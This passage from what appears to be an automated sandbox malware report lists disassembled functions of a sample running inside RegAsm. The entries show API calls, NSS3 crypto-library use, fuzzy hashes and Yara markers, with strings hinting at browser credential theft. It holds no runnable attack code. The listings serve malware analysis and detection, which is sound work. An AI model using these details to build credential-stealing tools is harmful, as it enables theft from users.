                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                                                                                                                                    • Part of subcall function 6C967260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C911CCC,00000000,00000000,?,?), ref: 6C96729F
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C97CD9B
                                                                                                                                                                                                                                                                  • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C97CE0B
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C97CE2C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C97CE40
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: TlsGetValue.KERNEL32 ref: 6C9714E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: EnterCriticalSection.KERNEL32 ref: 6C9714F5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9714C0: PR_Unlock.NSS3 ref: 6C97150D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: PORT_ArenaMark_Util.NSS3(?,6C97CD93,?), ref: 6C97CEEE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C97CD93,?), ref: 6C97CEFC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C97CD93,?), ref: 6C97CF0B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C97CD93,?), ref: 6C97CF1D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF47
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF67
                                                                                                                                                                                                                                                                    • Part of subcall function 6C97CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C97CD93,?,?,?,?,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF78
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3748922049-0
                                                                                                                                                                                                                                                                  • Opcode ID: 36de9fd9717234d52a7e37d845652f3034869c33d9cb22aad22095469079baf9
                                                                                                                                                                                                                                                                  • Instruction ID: f53f41f9225cce7b7d1cb5ba0927d319323d429ed250efca895667d2f494b280
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36de9fd9717234d52a7e37d845652f3034869c33d9cb22aad22095469079baf9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D51B576A025019BE730EF69DC40BAA73F8AF68348F250524D959A7B40EB31ED05CBA1
                                                                                                                                                                                                                                                                  Function 0041AD57 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041AD65
                                                                                                                                                                                                                                                                    • Part of subcall function 00419743: __mtinitlocknum.LIBCMT ref: 00419759
                                                                                                                                                                                                                                                                    • Part of subcall function 00419743: __amsg_exit.LIBCMT ref: 00419765
                                                                                                                                                                                                                                                                    • Part of subcall function 00419743: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2,?,?,004183AB,00000000,0042DCE8,004183F2,?), ref: 0041976D
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(0042DC70,00000020,0041AEA8,00000000,00000001,00000000,?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D), ref: 0041ADA1
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2), ref: 0041ADB2
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A32A: EncodePointer.KERNEL32(00000000,0041DEFF,00641400,00000314,00000000,?,?,?,?,?,0041B0BF,00641400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041A32C
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(-00000004,?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2), ref: 0041ADD8
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2), ref: 0041ADEB
                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041AECA,000000FF,?,0041976A,00000011,00000000,?,0041A3B1,0000000D,?,?,0041A805,004192A2), ref: 0041ADF5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2005412495-0
                                                                                                                                                                                                                                                                  • Opcode ID: fbaf8bc8fdaad2772f2fa9617a7dfcaf8ae3667767d5aa70daa19de8cdebad97
                                                                                                                                                                                                                                                                  • Instruction ID: 164a7a9cf12da0d0c7ce67e8a7a5d1831e5fbf5bcdf129820e4951e280cbab1a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbaf8bc8fdaad2772f2fa9617a7dfcaf8ae3667767d5aa70daa19de8cdebad97
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29312774D4231ADFDF109FA5D9446DDBBB2BF09314F10402BE524AA251DBB849E1CF2A
                                                                                                                                                                                                                                                                  Function 6C9A3C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9A5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C9A5B56
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9A3D3F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: PORT_NewArena_Util.NSS3(00000800,6C9A3CAF,?), ref: 6C91BABF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C9A3CAF,?), ref: 6C91BAD5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C9A3CAF,?), ref: 6C91BB08
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C9A3CAF,?), ref: 6C91BB1A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C91BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C9A3CAF,?), ref: 6C91BB3B
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C9A3CCB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: TlsGetValue.KERNEL32 ref: 6C9D90AB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: TlsGetValue.KERNEL32 ref: 6C9D90C9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: EnterCriticalSection.KERNEL32 ref: 6C9D90E5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: TlsGetValue.KERNEL32 ref: 6C9D9116
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9090: LeaveCriticalSection.KERNEL32 ref: 6C9D913F
                                                                                                                                                                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C9A3CE2
                                                                                                                                                                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9A3CF8
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C9A3D15
                                                                                                                                                                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C9A3D2E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4030862364-0
                                                                                                                                                                                                                                                                  • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                                  • Instruction ID: 26ba4aa7aaf330e2d142fe2b08189fe1446e444d119101a3edb32efe9e714087
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4112E79610600AFE7205EB5FC417ABB2F9FF31209F514534E40A9BB20E632F81AC652
                                                                                                                                                                                                                                                                  Function 00419B30 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00419B3C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A494: __getptd_noexit.LIBCMT ref: 0041A497
                                                                                                                                                                                                                                                                    • Part of subcall function 0041A494: __amsg_exit.LIBCMT ref: 0041A4A4
                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00419B5C
                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00419B6C
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 00419B89
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00419B9C
                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(0042F1C0), ref: 00419BB4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3470314060-0
                                                                                                                                                                                                                                                                  • Opcode ID: 45de6f80447344b063e229f586300a34b9c39fcccb74b3ef486156084ec7f7ab
                                                                                                                                                                                                                                                                  • Instruction ID: a407a3b43cc7b3ad1cc2e6ad255dcf757806dce5c2ce1f4a4ed06d24bc7225df
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45de6f80447344b063e229f586300a34b9c39fcccb74b3ef486156084ec7f7ab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA01A131E05621ABDB20AF26A455BDE7360BF04710F80402BE814A3291C73C7DC2CBDD
                                                                                                                                                                                                                                                                  Function 00410E9F Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00411A4A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EAB
                                                                                                                                                                                                                                                                  • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,00000104,?,00411A4A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EC4
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000104,?,00411A4A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410ED6
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410EE8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                                  • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                                                                                                                                                                                  • API String ID: 1206339513-4107738187
                                                                                                                                                                                                                                                                  • Opcode ID: 51fd8cd86627cdee8e2170973e9c168ec0bd6c42f2c3c39c37669ffa744839bf
                                                                                                                                                                                                                                                                  • Instruction ID: f0ea62394ffc743f40371cd98d7a8ebb55d675c87f44a15804ffb25ec00d38e9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51fd8cd86627cdee8e2170973e9c168ec0bd6c42f2c3c39c37669ffa744839bf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20F0E9362002297FDB411F59DC489DBBFAEEF4A7A5B044025FE0893211CB755D548BE5
                                                                                                                                                                                                                                                                  Function 6C95FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C95FC55
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C95FCB2
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C95FDB7
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C95FDDE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: TlsGetValue.KERNEL32(?,6C97085A,00000000,?,6C918369,?), ref: 6C968821
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: TlsGetValue.KERNEL32(?,?,6C97085A,00000000,?,6C918369,?), ref: 6C96883D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: EnterCriticalSection.KERNEL32(?,?,?,6C97085A,00000000,?,6C918369,?), ref: 6C968856
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C968887
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968800: PR_Unlock.NSS3(?,?,?,?,6C97085A,00000000,?,6C918369,?), ref: 6C968899
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                                                                  • String ID: pkcs11:
                                                                                                                                                                                                                                                                  • API String ID: 362709927-2446828420
                                                                                                                                                                                                                                                                  • Opcode ID: 6ad3ddc7725c72f5135cb39e3edb47ee695e4ff3c2bee41f36f1ace19e85390e
                                                                                                                                                                                                                                                                  • Instruction ID: 21b47b1b2faf1053b1b2b6be166ba8f263d59d2e575bd41ce2ca00f59f88a4df
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ad3ddc7725c72f5135cb39e3edb47ee695e4ff3c2bee41f36f1ace19e85390e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A551E4B6A002219BEB00CF65DC40F5A3379AF6136CF950065DD14ABF91EB30E925CB92
                                                                                                                                                                                                                                                                  Function 00406404 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                                  • String ID: v10
                                                                                                                                                                                                                                                                  • API String ID: 2733184300-1337588462
                                                                                                                                                                                                                                                                  • Opcode ID: 9429eeae7bf5a7528f21b0232d197a0eff8be50cab6ea93a15bb8372693a4ed7
                                                                                                                                                                                                                                                                  • Instruction ID: 66fd29d6e76afeb09774b313293b398b0a4ce8609c4e547abed7e25eed0f0ce9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9429eeae7bf5a7528f21b0232d197a0eff8be50cab6ea93a15bb8372693a4ed7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73319DB1900209ABCB10DFA5DC81AEEBB78EF41318F10413FF812BA2C5D7789A55CB58
                                                                                                                                                                                                                                                                  Function 0040DEFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040DF13
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6D5
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: __CxxThrowException@8.LIBCMT ref: 0041E6EA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041E6C0: std::exception::exception.LIBCMT ref: 0041E6FB
                                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040DF35
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040DF72
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
